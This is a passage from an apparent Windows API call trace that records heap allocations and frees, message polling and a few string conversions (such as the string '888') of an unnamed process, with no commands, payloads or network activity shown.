(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0161.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0161.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a00b0 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0161.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x34a0080, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.147] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0161.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0161.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a00a0 [0161.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0161.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.150] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b2db8 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0161.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x34a0080, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a0060 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0161.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 